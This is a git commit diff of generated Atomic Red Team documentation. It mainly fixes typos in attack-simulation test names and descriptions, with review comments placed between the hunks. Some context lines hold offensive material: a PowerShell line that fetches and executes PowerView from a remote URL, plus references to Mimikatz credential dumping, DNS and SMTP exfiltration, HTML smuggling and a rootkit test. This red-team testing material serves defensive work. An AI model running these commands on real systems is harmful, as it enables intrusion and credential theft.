Generated docs from job=generate-docs branch=master [ci skip]

This commit is contained in:
Atomic Red Team doc generator
2023-05-31 20:51:23 +00:00
parent 65294196d0
commit a59de488ff
22 changed files with 62 additions and 62 deletions
File diff suppressed because one or more lines are too long
+3 -3
@@ -1132,8 +1132,8 @@ collection,T1125,Video Capture,1,Registry artefact when application use webcam,6
collection,T1114.003,Email Collection: Email Forwarding Rule,1,Office365 - Email Forwarding,3234117e-151d-4254-9150-3d0bac41e38c,powershell
collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
collection,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administive share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administive share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administrative share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administrative share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
collection,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
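Review bot: The two T1039 rows change only the Test Name column ("Administive" to "Administrative"); the Test GUID column (6ed67921-1774-44ba-bac6-adb51ed60660 and 7762e120-5879-44ff-97f8-008b401b9a98) is unchanged, so GUID-based selection with Invoke-AtomicTest -TestGuids keeps working, but anyone selecting these tests with -TestNames needs the new spelling. A one-line mention of the rename in the commit message, which currently says only "Generated docs", would save people a search.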
@@ -1534,7 +1534,7 @@ discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Act
discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1018,Remote System Discovery,19,Get-WmiObject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
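Review bot: The capitalisation fix to "Get-WmiObject" in the Test Name column is not mirrored in the test's description, which still reads "utilize get-wmiobject" in the YAML hunks later in this commit; correct both in the source atomic so name and description agree. The Test GUID e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad is unchanged, so this is display-only.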
@@ -771,8 +771,8 @@ collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With Po
collection,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
collection,T1125,Video Capture,1,Registry artefact when application use webcam,6581e4a7-42e3-43c5-a0d2-5a0d62f9702a,command_prompt
collection,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administive share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administive share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administrative share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administrative share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
collection,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
@@ -1057,7 +1057,7 @@ discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Act
discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1018,Remote System Discovery,19,Get-WmiObject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
+3 -3
@@ -1805,8 +1805,8 @@
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1039 Data from Network Shared Drive](../../T1039/T1039.md)
- Atomic Test #1: Copy a sensitive File over Administive share with copy [windows]
- Atomic Test #2: Copy a sensitive File over Administive share with Powershell [windows]
- Atomic Test #1: Copy a sensitive File over Administrative share with copy [windows]
- Atomic Test #2: Copy a sensitive File over Administrative share with Powershell [windows]
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
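Review bot: "Powershell" in "Copy a sensitive File over Administrative share with Powershell" is still cased inconsistently against "PowerShell - Prompt User for Password" a few lines above. Since the test name is being corrected anyway, fix the product name in the same pass; it comes from the `name:` field of the T1039 atomic, so the change belongs in the source YAML rather than in this generated index.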
@@ -2369,7 +2369,7 @@
- Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
- Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
- Atomic Test #18: Get-DomainController with PowerView [windows]
- Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
- Atomic Test #19: Get-WmiObject to Enumerate Domain Controllers [windows]
- Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
@@ -1281,8 +1281,8 @@
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1039 Data from Network Shared Drive](../../T1039/T1039.md)
- Atomic Test #1: Copy a sensitive File over Administive share with copy [windows]
- Atomic Test #2: Copy a sensitive File over Administive share with Powershell [windows]
- Atomic Test #1: Copy a sensitive File over Administrative share with copy [windows]
- Atomic Test #2: Copy a sensitive File over Administrative share with Powershell [windows]
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1698,7 +1698,7 @@
- Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
- Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
- Atomic Test #18: Get-DomainController with PowerView [windows]
- Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
- Atomic Test #19: Get-WmiObject to Enumerate Domain Controllers [windows]
- Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #3: Port Scan NMap for Windows [windows]
+15 -15
@@ -1870,7 +1870,7 @@ defense-evasion:
- linux
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequistes are fetched.
description: Path to the rootkit source. Used when prerequisites are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_path:
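Review bot: Description-only fix; the `type: path` and the `default` of PathToAtomicsFolder/T1014/src/Linux are untouched, so no test behaviour changes. The identical `rootkit_source_path` argument in the next hunk gets the same correction, which is right, since both T1014 tests declare the argument separately.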
@@ -1917,7 +1917,7 @@ defense-evasion:
- linux
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequistes are fetched.
description: Path to the rootkit source. Used when prerequisites are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_name:
@@ -21171,7 +21171,7 @@ defense-evasion:
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path/filename to save the dowloaded file to
description: Local path/filename to save the downloaded file to
type: path
default: Atomic-license.txt
executor:
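Review bot: Typo fix only, but note that the `default` for the download URL two lines above this argument points at the master branch (raw.githubusercontent.com/.../master/LICENSE.txt) rather than a pinned commit, so the file this test fetches can change underneath it. Not introduced here, but a pinned ref in the source atomic would make the test reproducible.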
@@ -23449,7 +23449,7 @@ defense-evasion:
as a part of the process. \nCertain processes are not typically observed compiling
C# code, but can do so without touching disk. This can be used to unpack a
payload for execution.\nThe exe file that will be executed is named as T1027.004_DynamicCompile.exe
is containted in the 'bin' folder of this atomic, and the source code to the
is contained in the 'bin' folder of this atomic, and the source code to the
file is in the 'src' folder.\nUpon execution, the exe will print 'T1027.004
Dynamic Compile'.\n"
supported_platforms:
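Review bot: After the "contained" fix the sentence still reads "The exe file that will be executed is named as T1027.004_DynamicCompile.exe is contained in the 'bin' folder", two main verbs with no conjunction. Suggest "The exe file that will be executed is named T1027.004_DynamicCompile.exe and is contained in the 'bin' folder of this atomic". Make the change in the T1027.004 atomic so the markdown regenerates with the same wording.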
@@ -25354,7 +25354,7 @@ defense-evasion:
- name: HTML Smuggling Remote Payload
auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
description: "The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso)
without userinteraction. \nThe HTML file is based off of the work from [Stan
without user interaction. \nThe HTML file is based off of the work from [Stan
Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)\n"
supported_platforms:
- windows
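Review bot: "based off of the work from" should be "based on the work of" in the same sentence being edited. The ISO link is pinned to commit d0dad62dbcae9c60c519368e82c196a3db577055, which is the right practice for a remote payload reference; keep it pinned.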
@@ -46013,7 +46013,7 @@ execution:
will be displayed on the screen if it exists.\nA common feedback message is
that \"No instance(s) Available\" if the service queried is not running.\nA
common error message is \"Node - (provided IP or default) ERROR Description
=The RPC server is unavailable\" \nif the provided remote host is unreacheable\n"
=The RPC server is unavailable\" \nif the provided remote host is unreachable\n"
supported_platforms:
- windows
input_arguments:
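Review bot: "unreachable" is now spelled correctly, but the `\n` placed right before "if the provided remote host" splits the sentence "A common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable" across two rendered lines. Move the line break to before "A common error message" or drop it so the error text and its condition stay together.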
@@ -79691,7 +79691,7 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
identifier: T1039
atomic_tests:
- name: Copy a sensitive File over Administive share with copy
- name: Copy a sensitive File over Administrative share with copy
auto_generated_guid: 6ed67921-1774-44ba-bac6-adb51ed60660
description: |-
Copy from sensitive File from the c$ of another LAN computer with copy cmd
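Review bot: The test name is fixed, but the description on the last context line, "Copy from sensitive File from the c$ of another LAN computer with copy cmd", is still garbled (doubled "from", stray capital on "File"). Suggest "Copy a sensitive file from the C$ administrative share of another LAN computer with the copy command". Both strings live in the T1039 atomic, so correct them there together.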
@@ -79739,7 +79739,7 @@ collection:
del %TEMP%\#{local_file}
name: command_prompt
elevation_required: true
- name: Copy a sensitive File over Administive share with Powershell
- name: Copy a sensitive File over Administrative share with Powershell
auto_generated_guid: 7762e120-5879-44ff-97f8-008b401b9a98
description: |-
Copy from sensitive File from the c$ of another LAN computer with powershell
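Review bot: Same garbled description as the previous test ("Copy from sensitive File from the c$ of another LAN computer with powershell"), and "Powershell" in the renamed test name should be "PowerShell". The `elevation_required: true` in the context above is appropriate, since the C$ share is readable only by administrators of the remote host.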
@@ -89041,7 +89041,7 @@ credential-access:
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
supported_platforms:
- windows
dependency_executor_name: command_prompt
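Review bot: "use the get_prereq_command's to meet the prerequisites" carries a stray possessive apostrophe; should be "use the get_prereq_command to meet the prerequisites". The rendered markdown for this test further down in the commit has the same slip, so fix it in the source atomic.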
@@ -89143,7 +89143,7 @@ credential-access:
mimikatz script.\nIf Mimikatz runs successfully you will see several usernames
and hashes output to the screen.\nCommon failures include seeing an \\\"access
denied\\\" error which results when Anti-Virus blocks execution. \nOr, if
you try to run the test without the required administrative privleges you
you try to run the test without the required administrative privileges you
will see this error near the bottom of the output to the screen \"ERROR kuhl_m_sekurlsa_acquireLSA\"\n"
supported_platforms:
- windows
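Review bot: Within this single double-quoted YAML scalar, "access denied" is escaped as `\\\"access denied\\\"` while "ERROR kuhl_m_sekurlsa_acquireLSA" on the corrected line is escaped as `\"...\"`. The extra backslash pair is a literal backslash at the YAML level, so it survives into the text and appears as `\"access denied\"` in the rendered markdown for this test later in this commit. Normalise to `\"access denied\"` in the source description.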
@@ -93660,7 +93660,7 @@ credential-access:
auto_generated_guid: a0bced08-3fc5-4d8b-93b7-e8344739376e
description: "The following Atomic will run Get-ADReplAccount from DSInternals.\nUpon
successful execution, domain and credentials will appear in stdout. \n[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/)
CrowdStrike StellerParticle.\nhttps://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/\n"
CrowdStrike StellarParticle.\nhttps://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/\n"
supported_platforms:
- windows
input_arguments:
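Review bot: "StellarParticle" now matches the campaign name in the linked CrowdStrike URL. The bare dsinternals.com URL on the same line could use the same [Reference](...) link form as the CrowdStrike one so both references render as links.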
@@ -101143,7 +101143,7 @@ discovery:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
name: powershell
- name: Get-wmiobject to Enumerate Domain Controllers
- name: Get-WmiObject to Enumerate Domain Controllers
auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
description: |
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
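Review bot: The name is now "Get-WmiObject" but the description on the last context line still says "utilize get-wmiobject"; change both in the source atomic. Separately, the context above shows the neighbouring PowerView test pulling Recon/PowerView.ps1 from the master branch via IEX (IWR ...); executing unpinned remote code is expected for this atomic, but a pinned commit ref would make the test reproducible and the hash of what ran knowable.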
@@ -101265,7 +101265,7 @@ discovery:
description: |
Scan ports to check for listening ports with Nmap.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
supported_platforms:
- linux
- macos
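Review bot: Spelling fix is fine; "contact a single or range of addresses on port 80" still reads awkwardly, suggest "contact a single address or a range of addresses on port 80". This description is regenerated into three aggregate files in this commit, so the wording fix belongs in the T1046 atomic, not the generated output.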
@@ -112639,7 +112639,7 @@ exfiltration:
name: sh
- name: DNSExfiltration (doh)
auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48
description: "DNSExfiltrator allows for transfering (exfiltrate) a file over
description: "DNSExfiltrator allows for transferring (exfiltrate) a file over
a DNS request covert channel. This is basically a data leak testing tool allowing
to exfiltrate data over a covert channel.\n!!! Test will fail without a domain
under your control with A record and NS record !!! \nSee this github page
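Review bot: "allows for transferring (exfiltrate) a file" mixes a gerund with a bare verb; use "allows transferring (exfiltrating) a file" or "allows you to transfer (exfiltrate) a file". The warning that the test fails without a domain under your control with A and NS records is the operational caveat that matters here and should stay prominent.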
@@ -113355,7 +113355,7 @@ exfiltration:
auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
description: |
Exfiltration of specified file over SMTP.
Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
supported_platforms:
- windows
executor:
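Review bot: "send an email with attached file to exfiltrate to a remote address" is now two words but still ambiguous about what is attached and where it goes; suggest "send an email to a remote address with the file to exfiltrate attached".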
+3 -3
@@ -1500,7 +1500,7 @@ defense-evasion:
- linux
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequistes are fetched.
description: Path to the rootkit source. Used when prerequisites are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_path:
@@ -1547,7 +1547,7 @@ defense-evasion:
- linux
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequistes are fetched.
description: Path to the rootkit source. Used when prerequisites are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_name:
@@ -66897,7 +66897,7 @@ discovery:
description: |
Scan ports to check for listening ports with Nmap.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
supported_platforms:
- linux
- macos
+1 -1
@@ -63841,7 +63841,7 @@ discovery:
description: |
Scan ports to check for listening ports with Nmap.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
supported_platforms:
- linux
- macos
+12 -12
@@ -18342,7 +18342,7 @@ defense-evasion:
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path/filename to save the dowloaded file to
description: Local path/filename to save the downloaded file to
type: path
default: Atomic-license.txt
executor:
@@ -20510,7 +20510,7 @@ defense-evasion:
as a part of the process. \nCertain processes are not typically observed compiling
C# code, but can do so without touching disk. This can be used to unpack a
payload for execution.\nThe exe file that will be executed is named as T1027.004_DynamicCompile.exe
is containted in the 'bin' folder of this atomic, and the source code to the
is contained in the 'bin' folder of this atomic, and the source code to the
file is in the 'src' folder.\nUpon execution, the exe will print 'T1027.004
Dynamic Compile'.\n"
supported_platforms:
@@ -21872,7 +21872,7 @@ defense-evasion:
- name: HTML Smuggling Remote Payload
auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
description: "The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso)
without userinteraction. \nThe HTML file is based off of the work from [Stan
without user interaction. \nThe HTML file is based off of the work from [Stan
Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)\n"
supported_platforms:
- windows
@@ -40194,7 +40194,7 @@ execution:
will be displayed on the screen if it exists.\nA common feedback message is
that \"No instance(s) Available\" if the service queried is not running.\nA
common error message is \"Node - (provided IP or default) ERROR Description
=The RPC server is unavailable\" \nif the provided remote host is unreacheable\n"
=The RPC server is unavailable\" \nif the provided remote host is unreachable\n"
supported_platforms:
- windows
input_arguments:
@@ -69220,7 +69220,7 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
identifier: T1039
atomic_tests:
- name: Copy a sensitive File over Administive share with copy
- name: Copy a sensitive File over Administrative share with copy
auto_generated_guid: 6ed67921-1774-44ba-bac6-adb51ed60660
description: |-
Copy from sensitive File from the c$ of another LAN computer with copy cmd
@@ -69268,7 +69268,7 @@ collection:
del %TEMP%\#{local_file}
name: command_prompt
elevation_required: true
- name: Copy a sensitive File over Administive share with Powershell
- name: Copy a sensitive File over Administrative share with Powershell
auto_generated_guid: 7762e120-5879-44ff-97f8-008b401b9a98
description: |-
Copy from sensitive File from the c$ of another LAN computer with powershell
@@ -77300,7 +77300,7 @@ credential-access:
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
supported_platforms:
- windows
dependency_executor_name: command_prompt
@@ -77402,7 +77402,7 @@ credential-access:
mimikatz script.\nIf Mimikatz runs successfully you will see several usernames
and hashes output to the screen.\nCommon failures include seeing an \\\"access
denied\\\" error which results when Anti-Virus blocks execution. \nOr, if
you try to run the test without the required administrative privleges you
you try to run the test without the required administrative privileges you
will see this error near the bottom of the output to the screen \"ERROR kuhl_m_sekurlsa_acquireLSA\"\n"
supported_platforms:
- windows
@@ -81459,7 +81459,7 @@ credential-access:
auto_generated_guid: a0bced08-3fc5-4d8b-93b7-e8344739376e
description: "The following Atomic will run Get-ADReplAccount from DSInternals.\nUpon
successful execution, domain and credentials will appear in stdout. \n[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/)
CrowdStrike StellerParticle.\nhttps://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/\n"
CrowdStrike StellarParticle.\nhttps://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/\n"
supported_platforms:
- windows
input_arguments:
@@ -87277,7 +87277,7 @@ discovery:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
name: powershell
- name: Get-wmiobject to Enumerate Domain Controllers
- name: Get-WmiObject to Enumerate Domain Controllers
auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
description: |
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
@@ -97867,7 +97867,7 @@ exfiltration:
atomic_tests:
- name: DNSExfiltration (doh)
auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48
description: "DNSExfiltrator allows for transfering (exfiltrate) a file over
description: "DNSExfiltrator allows for transferring (exfiltrate) a file over
a DNS request covert channel. This is basically a data leak testing tool allowing
to exfiltrate data over a covert channel.\n!!! Test will fail without a domain
under your control with A record and NS record !!! \nSee this github page
@@ -98503,7 +98503,7 @@ exfiltration:
auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
description: |
Exfiltration of specified file over SMTP.
Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
supported_platforms:
- windows
executor:
+2 -2
@@ -355,7 +355,7 @@ Parses secrets hidden in the LSASS process with python. Similar to mimikatz's se
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
**Supported Platforms:** Windows
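Review bot: Same stray apostrophe as in the YAML source: "use the get_prereq_command's to meet the prerequisites" should be "use the get_prereq_command to meet the prerequisites".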
@@ -512,7 +512,7 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
**Supported Platforms:** Windows
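Review bot: The rendered paragraph shows literal backslashes in `\"access denied\"`, which come from the over-escaped `\\\"` in the YAML description, while the corrected line quotes "ERROR kuhl_m_sekurlsa_acquireLSA" with plain quotes. The two quoted strings render differently; fix the escaping in the source description so both come out as plain quotes.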
+1 -1
@@ -75,7 +75,7 @@ Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
## Atomic Test #2 - Run DSInternals Get-ADReplAccount
The following Atomic will run Get-ADReplAccount from DSInternals.
Upon successful execution, domain and credentials will appear in stdout.
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellarParticle.
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
**Supported Platforms:** Windows
+2 -2
@@ -32,7 +32,7 @@ Loadable Kernel Module based Rootkit
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_path | Path To rootkit | string | PathToAtomicsFolder/T1014/bin|
| rootkit_name | Module name | string | T1014|
@@ -91,7 +91,7 @@ Loadable Kernel Module based Rootkit
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_name | Module name | string | T1014|
+1 -1
@@ -378,7 +378,7 @@ sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
<br/>
## Atomic Test #9 - DNS Server Discovery Using nslookup
Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by Qakbot malware to gather information on the domain
Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain
controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/
**Supported Platforms:** Windows
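Review bot: This hunk lowercases "Qakbot" to "qakbot", the opposite direction from every other change in this commit. Qakbot is a proper noun (the linked securelist.com article uses "Qakbot" in its title), so the edit to the source atomic that produced this regeneration should be reverted. While there, "This tool is being abused by Qakbot malware" should read "This technique is abused by Qakbot malware", since nslookup is a standard Windows utility and the abuse is of the query, not of a tool the test ships.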
+1 -1
@@ -45,7 +45,7 @@ Adversaries may also target discovery of network infrastructure as well as lever
- [Atomic Test #18 - Get-DomainController with PowerView](#atomic-test-18---get-domaincontroller-with-powerview)
- [Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers](#atomic-test-19---get-wmiobject-to-enumerate-domain-controllers)
- [Atomic Test #19 - Get-WmiObject to Enumerate Domain Controllers](#atomic-test-19---get-wmiobject-to-enumerate-domain-controllers)
- [Atomic Test #20 - Remote System Discovery - net group Domain Controller](#atomic-test-20---remote-system-discovery---net-group-domain-controller)
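Review bot: the casing fix to `Get-WmiObject` matches the canonical cmdlet name, and leaving the link target lowercase is correct for generated anchors. Confirm that the `## Atomic Test #19` heading further down the same file carries the same casing; only the table-of-contents line is visible in this hunk, and if the heading was not regenerated from the same source the two will diverge.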
+1 -1
@@ -74,7 +74,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Dynamic C# Compile
When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.
The exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
The exe file that will be executed is named as T1027.004_DynamicCompile.exe is contained in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
